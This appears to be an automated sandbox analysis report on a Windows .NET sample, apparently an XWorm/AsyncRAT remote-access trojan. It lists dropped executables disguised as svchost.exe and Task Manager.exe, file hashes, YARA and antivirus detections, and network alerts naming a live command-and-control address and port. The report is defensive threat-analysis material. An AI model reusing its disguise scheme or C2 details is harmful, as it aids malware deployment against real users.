                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                        Process:C:\Users\user\Desktop\dLRcE11Dkl.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:true
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................
                                                                        Process:C:\Users\user\AppData\Roaming\All function.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):68608
                                                                        Entropy (8bit):6.827155160364474
                                                                        Encrypted:false
                                                                        SSDEEP:1536:/0DwewicrbsN/YlRr2RF49I+g6iOwHTG+zfpIK7G4gkNxIkpv5X:/0DweDN/UrKF49I9OwR97akMkpv5X
                                                                        MD5:2B1BCFF698482A45A0D01356AD3E0384
                                                                        SHA1:77D106B1495B869600CDFDA6AFEAEC0F75A78634
                                                                        SHA-256:A9BD5014B5A6744B0A5C180A3E76FF546A514DCBAD8BF2D8C500F903A285424B
                                                                        SHA-512:E8B6A729F3B4FC02886AEED232511DC9407A52AAE40F01CD2817F8369944B14240BD3EDFD573DBDEF0D506557F02622148CE4042F6F497C20F1F11AF85EEAC77
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                        Joe Sandbox View:
                                                                        • Filename: 4QnTBz8fN3.exe, Detection: malicious, Browse
                                                                        Process:C:\Users\user\AppData\Roaming\All function.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):14620672
                                                                        Entropy (8bit):1.5206321974035562
                                                                        Encrypted:false
                                                                        SSDEEP:49152:AYt7bnFXIUBXA6emScu5nsX0kib2IXCsi:F3XfeYX0kq2mCl
                                                                        MD5:D3565F59BBADCCEDED3D00831AF9B9E9
                                                                        SHA1:DBEC6B8026BB9C1C5500C185C7F6F69B8839450B
                                                                        SHA-256:EFEC9245E0FD8B7F0074EAA849EA0FF77DA68D01597E3DCCA3109F9C421E5D3E
                                                                        SHA-512:D5A047F9D2136886F51162ED4F2394F8A269AC99F903014B8CB6F42B86A0FD1214FC5B2F9D55CE4EF011661BB924F46B305141A1E841472F65248E0C9CD9F528
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 62%
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Users\user\Desktop\dLRcE11Dkl.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1714688
                                                                        Entropy (8bit):7.785478204182643
                                                                        Encrypted:false
                                                                        SSDEEP:24576:vKtfxJeX3D/VXvXYAhrYcqLVwQjZf9WGT7IIveSMh:vKtfyHhvztOLVJJMw7Io
                                                                        MD5:FBD77E256063E3D225B8ECEC3BDBD6DB
                                                                        SHA1:1E15B2926C8E3588DB2992B24A53289742879785
                                                                        SHA-256:1F6CD59371626C0ACB440D08CAC4B378D32B964EF61A13DEF66963B9666130A3
                                                                        SHA-512:5654796D429229BB769A5385E941032BE8E0B0F1553498024F130B45629E1E51D5D29BA64DDC786E94DCB1513325A689377F57BDD1707DE577DCB8805E6122C0
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:g............................./... ...@....@.. ....................................@.................................|/..O....@..r....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...r....@......................@..@.reloc.......`.......(..............@..B................./......H.......`....2......!...$&..<.............................................(....*.r...p*. .)..*..(....*.r...p*. *p{.*.s.........s.........s.........s.........*.r...p*.rD..p*. .O..*.r...p*. ....*.r...p*. .(T.*.r...p*. %.Q.*..(&...*.r(..p*. ...*.r...p*. E/..*.rn..p*. .h.*.r...p*. ....*.r...p*. .l..*.rW..p*. .x!.*.r...p*. ....*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............( ...(!....+..*....0......
                                                                        Process:C:\Users\user\AppData\Roaming\All function.cmd
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1429504
                                                                        Entropy (8bit):7.87682182292117
                                                                        Encrypted:false
                                                                        SSDEEP:24576:ESU05nunJnowgqkXxP1mHk94So/b+XnWyVKkw6KKLC8kZm3Z9/pp4yk:Ex0yow0BYE6SoyXnZ3w6K+vRDhk
                                                                        MD5:7F9590397ABD938CFD86A9A7A6E51EF6
                                                                        SHA1:CBB2E5A197FD5A93B653C6937307BA711EB502B6
                                                                        SHA-256:1968DC63A803AEE28A327E9BAC7DCEA8C2680753FA646693670F5F0FDBAE600D
                                                                        SHA-512:515BAB44E81BEC9F67590FE79897134E283D7526810072271F2176FD7CEE86CF3C32333BFE493E8589C20F750AEDFDEFE863DDCB22B043C195885C9E5F65E522
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}50g.................B...........a... ........@.. .......................@............@..................................`..S.......,.................... ....................................................... ............... ..H............text....A... ...B.................. ..`.rsrc...,............D..............@..@.reloc....... ......................@..B.................`......H........I..............V'..."............................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                        Process:C:\Users\user\AppData\Roaming\All function.cmd
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):67072
                                                                        Entropy (8bit):5.869054111119525
                                                                        Encrypted:false
                                                                        SSDEEP:1536:ApB7P9Q0nkMPLCojIUcBZy73OuBvb9mvlqX6SM0NwOlDnT6f:Ap5DPLKMnb9UMiOlDnQ
                                                                        MD5:C5ACDDD1F31EA152420CD0BEC24636BA
                                                                        SHA1:10FF89A553836685BCA9823959777C10F5EB28D0
                                                                        SHA-256:2471E51C22C68A927FB0752DEB37EA44C135BA0302B4898D13C47BF2046B3467
                                                                        SHA-512:741861F9F0A75C0264D5164A9075C38EB646199319B5CBCB61E986CC953E1D005F1FB3EB4C94A0B93CCD73706EFC6A7791ECCB33A57BA01CE48A71109562A160
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:g................................. ... ....@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......x`..,.......&.....................................................(....*.r...p*. ....*..(....*.r...p*. S...*.s.........s.........s.........s.........*.r...p*. . ..*.rw..p*. .h..*.r...p*. ....*.r...p*. ..t.*.r%..p*. ?.,.*..((...*.r-..p*. ~.H.*.rg..p*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Q...*"(....+.*&(....&+.*.+5sc... .... .'..od...(,...~....-.(_...(Q...~....oe...&.-.*.r[..p*. e...*.r...p*. ..Q.*.r...p*. .(T.*.r...p*.rC..p*. ...*.r}..p*. ...*.r...p*. ....*.r..
                                                                        Process:C:\Users\user\Desktop\dLRcE11Dkl.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):72192
                                                                        Entropy (8bit):5.957835114883321
                                                                        Encrypted:false
                                                                        SSDEEP:1536:4pg0GhGEafZfYdln8baoeda9bPO26dgROjHMv8pE:4rhfZf68baoZOl2OjsKE
                                                                        MD5:E9A629DD7B0ACCDA9D7696FC15135663
                                                                        SHA1:D3643C86610E441DA6304670FE7E5C2D07D1A6DF
                                                                        SHA-256:BACE1C7A8D5498687DB5ABC129D37373A918D5BDA3EF11B94F21B3807887E799
                                                                        SHA-512:CCEADC67F570E0165B0925B450E06EAC2C46552E0B646A761862F5E6290FBDD727B84B41CA23470EDF42DA623643F29C58EA5A01BCF084F4488476ECACE144D6
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....2g............................./... ...@....@.. ....................................@................................../..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................./......H.......0d..\.......&.....................................................(....*.r...p*. B...*..(....*.r=..p*. ..9.*.s.........s.........s.........s.........*.ro..p*. .x!.*.r...p*. ..e.*.r...p*. .w..*.r...p*. .|..*.r7..p*. ....*..((...*.r7..p*.ri..p*. ...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. .l..*.r...p*. \...*.r...p*. ~.H.*.rA..p*.rs..p*. +L3.*.r...p*. .O..*.r...p*. L...*.r..
                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.968205639552514
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:dLRcE11Dkl.exe
                                                                        File size:1'801'728 bytes
                                                                        MD5:68157ed3390faca2a327e25148f4bd97
                                                                        SHA1:d5fa29334ce471ceac94be49a39d9398b13c8505
                                                                        SHA256:7eea25e9951efaa2c861551b031678b70e9e733c096877be5491457cb28561ab
                                                                        SHA512:2dd28552134896b7f77825904059df06a4582244cd937b9df8dd8b51b14e5eb5fe9dfe65d619e69504b73789aedca5971ce590740f7ac4bb68cc21b4b9eca751
                                                                        SSDEEP:24576:flroakFiyPRPC8oW++R7FaHFZnsxgT/x7hXh23wD4A12MgptxffEuBbJ4x+g3Ro9:f1kYyPRhfhaDZvXs3BptxffEuBbe6O6
                                                                        TLSH:D38568AB67E2523FDA44E8BB91C361D8DA55BCE197E83E30193C850A7142458BBC35FC
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E?g.................t..........n.... ........@.. ....................................@................................
                                                                        Icon Hash:00928e8e8686b000
                                                                        Entrypoint:0x5b926e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x673F45ED [Thu Nov 21 14:38:37 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                         Name | Virtual Address | Virtual Size | Is in Section
                                                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1b9218 | 0x53 | .text
                                                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1ba000 | 0x4e6 | .rsrc
                                                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1bc000 | 0xc | .reloc
                                                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                         Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                         .text | 0x2000 | 0x1b7274 | 0x1b7400 | 27ab9908cac47b8de1ed80ad95e4a07c | False | 0.8985820112407513 | data | 7.969273400624172 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                         .rsrc | 0x1ba000 | 0x4e6 | 0x600 | c87bb3af76797c469544436b38a861b4 | False | 0.380859375 | data | 3.7961052166947833 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                         .reloc | 0x1bc000 | 0xc | 0x200 | 5d8e27b7db48a4eba0cfd514f5e74d5c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                         RT_VERSION | 0x1ba0a0 | 0x25c | data | | | 0.46688741721854304
                                                                         RT_MANIFEST | 0x1ba2fc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                                                         DLL | Import
                                                                         mscoree.dll | _CorExeMain
                                                                         Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                         2024-11-23T21:09:32.706821+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49991 | 45.141.27.248 | 7777 | TCP
                                                                         2024-11-23T21:09:33.285602+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.27.248 | 7777 | 192.168.2.6 | 49991 | TCP
                                                                         2024-11-23T21:09:33.354089+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49991 | 45.141.27.248 | 7777 | TCP
                                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                         Nov 23, 2024 21:07:05.368881941 CET | 49707 | 80 | 192.168.2.6 | 208.95.112.1
                                                                         Nov 23, 2024 21:07:05.488459110 CET | 80 | 49707 | 208.95.112.1 | 192.168.2.6
                                                                         Nov 23, 2024 21:07:05.489203930 CET | 49707 | 80 | 192.168.2.6 | 208.95.112.1
